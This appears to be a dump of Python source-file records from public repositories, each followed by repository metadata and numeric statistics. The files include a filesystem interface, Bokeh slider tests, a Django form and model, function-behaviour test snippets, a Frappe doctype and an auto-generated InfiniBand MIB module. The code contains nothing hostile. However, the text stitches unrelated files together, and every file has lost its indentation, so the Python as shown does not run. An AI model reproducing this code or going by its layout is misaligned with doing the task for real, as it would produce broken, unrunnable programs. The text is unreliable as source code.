class Error(Exception):
"""Base class for filesystem error."""
pass
class StaleInodeError(Error):
"""The inode provided to open a file is stale / outdated."""
pass
class Device(abc.ABC):
"""A device underlying a filesystem."""
@abc.abstractmethod
def Read(self, offset: int, size: int) -> bytes:
"""Reads from the file."""
pass
class File(abc.ABC):
"""An open file."""
def __init__(self, filesystem: "Filesystem"):
self.filesystem = filesystem
@abc.abstractmethod
def Read(self, offset: int, size: int) -> bytes:
"""Read from a file at the given offset."""
pass
@abc.abstractmethod
def Close(self) -> None:
"""Close the file."""
pass
@abc.abstractmethod
def ListFiles(self) -> Iterable[filesystem_pb2.StatEntry]:
"""Lists files in a directory.
If the file is a regular file, lists alternate data streams.
"""
pass
@abc.abstractmethod
def Stat(self) -> filesystem_pb2.StatEntry:
"""Returns information about the file."""
pass
@abc.abstractmethod
def Inode(self) -> int:
"""Returns the inode number of the file."""
pass
@abc.abstractmethod
def LookupCaseInsensitive(self, name: str) -> Optional[str]:
"""Looks up a name in case insensitive mode.
Args:
name: Case-insensitive name to match.
Returns: the case-literal name or None if the case-insensitive name couldn't
be found.
"""
pass
class Filesystem(abc.ABC):
"""A filesystem implementation."""
def __init__(self, device: Device):
self.device = device
@abc.abstractmethod
def Open(self, path: str, stream_name: Optional[str]) -> File:
pass
@abc.abstractmethod
def OpenByInode(self, inode: int, stream_name: Optional[str]) -> File:
pass
class Files:
"""A collection of open files identified by integer ids."""
def __init__(self):
self._table = {} # type: Dict[int, File]
self._file_id_counter = 0
def Add(self, file: File) -> int:
file_id = self._file_id_counter
self._file_id_counter += 1
self._table[file_id] = file
return file_id
def Remove(self, file_id: int) -> None:
del self._table[file_id]
def Get(self, file_id: int) -> File:
return self._table[file_id]
| 22.53211 | 80 | 0.673453 | 329 | 2,456 | 4.908815 | 0.334347 | 0.037152 | 0.111455 | 0.089164 | 0.178947 | 0.166563 | 0.073065 | 0.073065 | 0.073065 | 0.073065 | 0 | 0.002565 | 0.206433 | 2,456 | 108 | 81 | 22.740741 | 0.826065 | 0.300896 | 0 | 0.407407 | 0 | 0 | 0.006192 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0.203704 | 0.055556 | 0.018519 | 0.481481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
92e0c3513f2ba0bf6e00b5b4cf0a62637fc82592 | 8,317 | py | Python | tests/unit/bokeh/models/widgets/test_slider.py | goncaloperes/bokeh | b857d2d17d7c19779bb0a7be2601d8238fb1d5e9 | [
"BSD-3-Clause"
] | 1 | 2021-04-09T02:57:29.000Z | 2021-04-09T02:57:29.000Z | tests/unit/bokeh/models/widgets/test_slider.py | goncaloperes/bokeh | b857d2d17d7c19779bb0a7be2601d8238fb1d5e9 | [
"BSD-3-Clause"
] | 1 | 2021-04-21T19:44:07.000Z | 2021-04-21T19:44:07.000Z | tests/unit/bokeh/models/widgets/test_slider.py | goncaloperes/bokeh | b857d2d17d7c19779bb0a7be2601d8238fb1d5e9 | [
"BSD-3-Clause"
] | null | null | null | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import logging
from datetime import date, datetime
# Bokeh imports
from bokeh.core.properties import UnsetValueError
from bokeh.core.validation.check import check_integrity
from bokeh.util.logconfig import basicConfig
from bokeh.util.serialization import convert_date_to_datetime, convert_datetime_type
# Module under test
import bokeh.models.widgets.sliders as mws # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
# needed for caplog tests to function
basicConfig()
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class TestSlider:
def test_value_and_value_throttled(self) -> None:
s0 = mws.Slider(start=0, end=10)
with pytest.raises(UnsetValueError):
s0.value
with pytest.raises(UnsetValueError):
s0.value_throttled
s1 = mws.Slider(start=0, end=10, value=5)
assert s1.value == 5
assert s1.value_throttled == 5
class TestRangeSlider:
def test_value_and_value_throttled(self) -> None:
s0 = mws.RangeSlider(start=0, end=10)
with pytest.raises(UnsetValueError):
s0.value
with pytest.raises(UnsetValueError):
s0.value_throttled
s1 = mws.RangeSlider(start=0, end=10, value=(4, 6))
assert s1.value == (4, 6)
assert s1.value_throttled == (4, 6)
def test_rangeslider_equal_start_end_exception(self) -> None:
start = 0
end = 0
with pytest.raises(ValueError):
mws.RangeSlider(start=start, end=end)
def test_rangeslider_equal_start_end_validation(self, caplog) -> None:
start = 0
end = 10
s = mws.RangeSlider(start=start, end=end)
#with caplog.at_level(logging.ERROR, logger='bokeh.core.validation.check'):
with caplog.at_level(logging.ERROR):
assert len(caplog.records) == 0
s.end = 0
check_integrity([s])
assert len(caplog.records) == 1
class TestDateSlider:
def test_value_and_value_throttled(self) -> None:
start = datetime(2021, 1, 1)
end = datetime(2021, 12, 31)
value = convert_date_to_datetime(datetime(2021, 2, 1))
s0 = mws.DateSlider(start=start, end=end)
with pytest.raises(UnsetValueError):
s0.value
with pytest.raises(UnsetValueError):
s0.value_throttled
s1 = mws.DateSlider(start=start, end=end, value=value)
assert s1.value == value
assert s1.value_throttled == value
def test_value_as_datetime_when_set_as_datetime(self) -> None:
start = datetime(2017, 8, 9, 0, 0)
end = datetime(2017, 8, 10, 0, 0)
s = mws.DateSlider(start=start, end=end, value=start)
assert s.value_as_datetime == start
def test_value_as_datetime_when_set_as_timestamp(self) -> None:
start = datetime(2017, 8, 9, 0, 0)
end = datetime(2017, 8, 10, 0, 0)
s = mws.DateSlider(start=start, end=end,
# Bokeh serializes as ms since epoch, if they get set as numbers (e.g.)
# by client side update, this is the units they will be
value=convert_datetime_type(start))
assert s.value_as_datetime == start
def test_value_as_date_when_set_as_date(self) -> None:
start = date(2017, 8, 9)
end = date(2017, 8, 10)
s = mws.DateSlider(start=start, end=end, value=end)
assert s.value_as_date == end
def test_value_as_date_when_set_as_timestamp(self) -> None:
start = date(2017, 8, 9)
end = date(2017, 8, 10)
s = mws.DateSlider(start=start, end=end,
# Bokeh serializes as ms since epoch, if they get set as numbers (e.g.)
# by client side update, this is the units they will be
value=convert_date_to_datetime(end))
assert s.value_as_date == end
class TestDateRangeSlider:
def test_value_and_value_throttled(self) -> None:
start = datetime(2021, 1, 1)
end = datetime(2021, 12, 31)
value = (convert_datetime_type(datetime(2021, 2, 1)), convert_datetime_type(datetime(2021, 2, 28)))
s0 = mws.DateRangeSlider(start=start, end=end)
with pytest.raises(UnsetValueError):
s0.value
with pytest.raises(UnsetValueError):
s0.value_throttled
s1 = mws.DateRangeSlider(start=start, end=end, value=value)
assert s1.value == value
assert s1.value_throttled == value
def test_value_as_datetime_when_set_as_datetime(self) -> None:
start = datetime(2017, 8, 9, 0, 0)
end = datetime(2017, 8, 10, 0, 0)
s = mws.DateRangeSlider(start=start, end=end, value=(start, end))
assert s.value_as_datetime == (start, end)
def test_value_as_datetime_when_set_as_timestamp(self) -> None:
start = datetime(2017, 8, 9, 0, 0)
end = datetime(2017, 8, 10, 0, 0)
s = mws.DateRangeSlider(start=start, end=end,
# Bokeh serializes as ms since epoch, if they get set as numbers (e.g.)
# by client side update, this is the units they will be
value=(convert_datetime_type(start), convert_datetime_type(end)))
assert s.value_as_datetime == (start, end)
def test_value_as_datetime_when_set_mixed(self) -> None:
start = datetime(2017, 8, 9, 0, 0)
end = datetime(2017, 8, 10, 0, 0)
s = mws.DateRangeSlider(start=start, end=end,
value=(start, convert_datetime_type(end)))
assert s.value_as_datetime == (start, end)
s = mws.DateRangeSlider(start=start, end=end,
value=(convert_datetime_type(start), end))
assert s.value_as_datetime == (start, end)
def test_value_as_date_when_set_as_date(self) -> None:
start = date(2017, 8, 9)
end = date(2017, 8, 10)
s = mws.DateRangeSlider(start=start, end=end, value=(start, end))
assert s.value_as_date == (start, end)
def test_value_as_date_when_set_as_timestamp(self) -> None:
start = date(2017, 8, 9)
end = date(2017, 8, 10)
s = mws.DateRangeSlider(start=start, end=end,
# Bokeh serializes as ms since epoch, if they get set as numbers (e.g.)
# by client side update, this is the units they will be
value=(convert_date_to_datetime(start), convert_date_to_datetime(end)))
assert s.value_as_date == (start, end)
def test_value_as_date_when_set_mixed(self) -> None:
start = date(2017, 8, 9)
end = date(2017, 8, 10)
s = mws.DateRangeSlider(start=start, end=end,
value=(start, convert_date_to_datetime(end)))
assert s.value_as_date == (start, end)
s = mws.DateRangeSlider(start=start, end=end,
value=(convert_date_to_datetime(start), end))
assert s.value_as_date == (start, end)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 40.178744 | 107 | 0.543345 | 976 | 8,317 | 4.459016 | 0.134221 | 0.058824 | 0.053768 | 0.066176 | 0.796645 | 0.783088 | 0.695083 | 0.683824 | 0.681526 | 0.673713 | 0 | 0.039711 | 0.218829 | 8,317 | 206 | 108 | 40.373786 | 0.630137 | 0.256583 | 0 | 0.610687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167939 | 1 | 0.122137 | false | 0 | 0.061069 | 0 | 0.21374 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92e20f5a400940f9c6f4ff5ba27074314871d27b | 1,029 | py | Python | Apis/canino/forms.py | fredmanre/RefugioPerro | cab8049dbb93e8f5bd94903890b59f9554177620 | [
"MIT"
] | 2 | 2017-04-25T10:14:08.000Z | 2020-10-19T04:12:26.000Z | Apis/canino/forms.py | fredmanre/RefugioPerro | cab8049dbb93e8f5bd94903890b59f9554177620 | [
"MIT"
] | null | null | null | Apis/canino/forms.py | fredmanre/RefugioPerro | cab8049dbb93e8f5bd94903890b59f9554177620 | [
"MIT"
] | null | null | null | from django import forms
from Apis.canino.models import Perro
class PerroForm(forms.ModelForm):
# TODO: Define other fields here
class Meta:
model = Perro
fields = [
'nombre',
'sexo',
'raza',
'edad',
'rescate',
'adoptante',
'vacuna',
]
labels = {
'nombre':'Nombre',
'sexo':'Sexo',
'raza':'Raza',
'edad':'Edad',
'rescate':'fecha de rescate o ingreso',
'adoptante': 'Adoptante',
'vacuna':'Vacunas',
}
widgets = {
'nombre':forms.TextInput(attrs={'class':'form-control'}),
'sexo':forms.Select(attrs={'class': 'form-control'}),
'raza':forms.Select(attrs={'class':'form-control'}),
'edad':forms.TextInput(attrs={'class':'form-control'}),
'rescate':forms.TextInput(attrs={'class':'form-control'}),
'adoptante':forms.Select(attrs={'class':'form-control'}),
'vacuna':forms.CheckboxSelectMultiple(),
}
| 26.384615 | 66 | 0.531584 | 96 | 1,029 | 5.697917 | 0.395833 | 0.109689 | 0.153565 | 0.230347 | 0.367459 | 0.367459 | 0 | 0 | 0 | 0 | 0 | 0 | 0.28863 | 1,029 | 38 | 67 | 27.078947 | 0.747268 | 0.029155 | 0 | 0 | 0 | 0 | 0.282849 | 0 | 0 | 0 | 0 | 0.026316 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92eb198c559a8b7b0c151e4707fd56d6fc32eee8 | 1,225 | py | Python | tests/snippets/function.py | sanxiyn/RustPython | 6308be3dfeb8e1b334136c81a4175514bb8561c3 | [
"MIT"
] | 3 | 2019-08-14T02:05:49.000Z | 2020-01-03T08:39:56.000Z | tests/snippets/function.py | Vicfred/RustPython | d42d422566f64f48311cc7e7efb4d0ffcefb0297 | [
"MIT"
] | null | null | null | tests/snippets/function.py | Vicfred/RustPython | d42d422566f64f48311cc7e7efb4d0ffcefb0297 | [
"MIT"
] | 1 | 2022-03-14T13:03:29.000Z | 2022-03-14T13:03:29.000Z | from testutils import assert_raises
__name__ = "function"
def foo():
"""test"""
return 42
assert foo() == 42
assert foo.__doc__ == "test"
assert foo.__name__ == "foo"
assert foo.__qualname__ == "foo"
assert foo.__module__ == "function"
def my_func(a,):
return a+2
assert my_func(2) == 4
def fubar():
return 42,
assert fubar() == (42,)
def f1():
"""test1"""
pass
assert f1.__doc__ == "test1"
def f2():
'''test2'''
pass
assert f2.__doc__ == "test2"
def f3():
"""
test3
"""
pass
assert f3.__doc__ == "\n test3\n "
def f4():
"test4"
pass
assert f4.__doc__ == "test4"
def revdocstr(f):
d = f.__doc__
d = d + 'w00t'
f.__doc__ = d
return f
@revdocstr
def f5():
"""abc"""
assert f5.__doc__ == 'abcw00t', f5.__doc__
def f6():
def nested():
pass
assert nested.__name__ == "nested"
assert nested.__qualname__ == "f6.<locals>.nested"
f6()
def f7():
try:
def t() -> void: # noqa: F821
pass
except NameError:
return True
return False
assert f7()
def f8() -> int:
return 10
assert f8() == 10
with assert_raises(SyntaxError):
exec('print(keyword=10, 20)')
| 12.5 | 54 | 0.564082 | 158 | 1,225 | 3.968354 | 0.379747 | 0.07177 | 0.044657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058757 | 0.277551 | 1,225 | 97 | 55 | 12.628866 | 0.649718 | 0.035918 | 0 | 0.109091 | 0 | 0 | 0.103388 | 0 | 0 | 0 | 0 | 0 | 0.327273 | 1 | 0.254545 | false | 0.109091 | 0.018182 | 0.054545 | 0.4 | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
92ed123607f4ba829a37581a4d90c0afcbd0d944 | 449 | py | Python | metalgrafica/metalgrafica/doctype/plantilla_de_grupo_de_productos/plantilla_de_grupo_de_productos.py | Nirchains/metal | c6e4d5abac15750c6b33287e16034e83d08d8243 | [
"MIT"
] | null | null | null | metalgrafica/metalgrafica/doctype/plantilla_de_grupo_de_productos/plantilla_de_grupo_de_productos.py | Nirchains/metal | c6e4d5abac15750c6b33287e16034e83d08d8243 | [
"MIT"
] | null | null | null | metalgrafica/metalgrafica/doctype/plantilla_de_grupo_de_productos/plantilla_de_grupo_de_productos.py | Nirchains/metal | c6e4d5abac15750c6b33287e16034e83d08d8243 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2017, Pedro Antonio Fernández Gómez and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Plantilladegrupodeproductos(Document):
def validate(self):
from erpnext.utilities.transaction_base import validate_uom_is_integer
validate_uom_is_integer(self, "stock_uom", "qty", "BOM Item")
| 29.933333 | 72 | 0.792873 | 58 | 449 | 5.913793 | 0.724138 | 0.06414 | 0.075802 | 0.116618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012723 | 0.124722 | 449 | 14 | 73 | 32.071429 | 0.860051 | 0.302895 | 0 | 0 | 0 | 0 | 0.064935 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.571429 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
92f42b3f1000b738a757e8000738711b76d4989d | 604 | py | Python | dynamo/__init__.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 236 | 2019-07-09T22:06:21.000Z | 2022-03-31T17:56:07.000Z | dynamo/__init__.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 115 | 2019-07-12T19:06:21.000Z | 2022-03-31T17:34:18.000Z | dynamo/__init__.py | xing-lab-pitt/dynamo-release | 76c1f2a270dd6722b88f4700aac1a1a725a0c261 | [
"BSD-3-Clause"
] | 34 | 2019-07-10T03:34:04.000Z | 2022-03-22T12:44:22.000Z | """Mapping Vector Field of Single Cells
"""
from .get_version import get_version
__version__ = get_version(__file__)
del get_version
from . import pp
from . import est
from . import tl
from . import vf
from . import pd
from . import pl
from . import mv
from . import sim
from .data_io import *
from . import sample_data
from . import configuration
from . import ext
from .get_version import get_all_dependencies_version
from .dynamo_logger import (
Logger,
LoggerManager,
main_tqdm,
main_info,
main_warning,
main_critical,
main_exception,
)
# alias
config = configuration
| 17.764706 | 53 | 0.746689 | 84 | 604 | 5.083333 | 0.452381 | 0.257611 | 0.065574 | 0.093677 | 0.107728 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193709 | 604 | 33 | 54 | 18.30303 | 0.876797 | 0.071192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.576923 | 0 | 0.576923 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
92f65b38e65637fea9a3fa9ba00277f49c816290 | 357 | py | Python | resolwe/flow/tests/fields_test_app/models.py | zagm/resolwe | da371a3ec0260a45ccab848704c6a339a0de79cc | [
"Apache-2.0"
] | null | null | null | resolwe/flow/tests/fields_test_app/models.py | zagm/resolwe | da371a3ec0260a45ccab848704c6a339a0de79cc | [
"Apache-2.0"
] | null | null | null | resolwe/flow/tests/fields_test_app/models.py | zagm/resolwe | da371a3ec0260a45ccab848704c6a339a0de79cc | [
"Apache-2.0"
] | null | null | null | # pylint: disable=missing-docstring
from versionfield import VersionField
from django.db import models
from resolwe.flow.models.fields import ResolweSlugField
class TestModel(models.Model):
name = models.CharField(max_length=30)
slug = ResolweSlugField(populate_from='name', unique_with='version')
version = VersionField(default='0.0.0')
| 22.3125 | 72 | 0.773109 | 44 | 357 | 6.204545 | 0.659091 | 0.014652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016077 | 0.128852 | 357 | 15 | 73 | 23.8 | 0.861736 | 0.092437 | 0 | 0 | 0 | 0 | 0.049689 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
92fbed840c9b0a49fb491163ba68ee60c91080c2 | 65,188 | py | Python | pysnmp/IB-SMA-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/IB-SMA-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/IB-SMA-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module IB-SMA-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IB-SMA-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:39:05 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueRangeConstraint, ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueRangeConstraint", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
IbDataPortAndInvalid, IbUnicastLid, IbMulticastLid, infinibandMIB, IbDataPort, IbGuid, IbSmPortList = mibBuilder.importSymbols("IB-TC-MIB", "IbDataPortAndInvalid", "IbUnicastLid", "IbMulticastLid", "infinibandMIB", "IbDataPort", "IbGuid", "IbSmPortList")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
TimeTicks, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, iso, Bits, Gauge32, MibIdentifier, NotificationType, IpAddress, Integer32, ObjectIdentity, ModuleIdentity, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "iso", "Bits", "Gauge32", "MibIdentifier", "NotificationType", "IpAddress", "Integer32", "ObjectIdentity", "ModuleIdentity", "Unsigned32")
TextualConvention, DisplayString, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString", "TruthValue")
ibSmaMIB = ModuleIdentity((1, 3, 6, 1, 3, 117, 3))
ibSmaMIB.setRevisions(('2005-09-01 12:00',))
if mibBuilder.loadTexts: ibSmaMIB.setLastUpdated('200509011200Z')
if mibBuilder.loadTexts: ibSmaMIB.setOrganization('IETF IP Over IB (IPOIB) Working Group')
ibSmaObjects = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1))
ibSmaNotifications = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 2))
ibSmaConformance = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 3))
ibSmaNodeInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 1))
ibSmaNodeString = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 1), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(1, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeString.setStatus('current')
ibSmaNodeBaseVersion = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeBaseVersion.setStatus('current')
ibSmaNodeClassVersion = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeClassVersion.setStatus('current')
ibSmaNodeType = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("channelAdapter", 1), ("switch", 2), ("router", 3), ("reserved", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeType.setStatus('current')
ibSmaNodeNumPorts = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeNumPorts.setStatus('current')
ibSmaSystemImageGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 6), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSystemImageGuid.setStatus('current')
ibSmaNodeGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 7), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeGuid.setStatus('current')
ibSmaNodePortGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 8), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodePortGuid.setStatus('current')
ibSmaNodePartitionTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 9), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodePartitionTableNum.setStatus('current')
ibSmaNodeDeviceId = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 10), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeDeviceId.setStatus('current')
ibSmaNodeRevision = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 11), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeRevision.setStatus('current')
ibSmaNodeLocalPortNumOrZero = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 12), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeLocalPortNumOrZero.setStatus('current')
ibSmaNodeVendorId = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 13), OctetString().subtype(subtypeSpec=ValueSizeConstraint(3, 3)).setFixedLength(3)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeVendorId.setStatus('current')
ibSmaNodeLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 14), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeLid.setStatus('current')
ibSmaNodePortNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 15), IbDataPort()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodePortNum.setStatus('current')
ibSmaNodeMethod = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 16), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeMethod.setStatus('current')
ibSmaNodeAttributeId = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 17), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeAttributeId.setStatus('current')
ibSmaNodeAttributeModifier = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 18), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeAttributeModifier.setStatus('current')
ibSmaNodeKey = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeKey.setStatus('current')
ibSmaNodeLid2 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 20), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeLid2.setStatus('current')
ibSmaNodeServiceLevel = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 21), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeServiceLevel.setStatus('current')
ibSmaNodeQueuePair1 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 22), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeQueuePair1.setStatus('current')
ibSmaNodeQueuePair2 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 23), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeQueuePair2.setStatus('current')
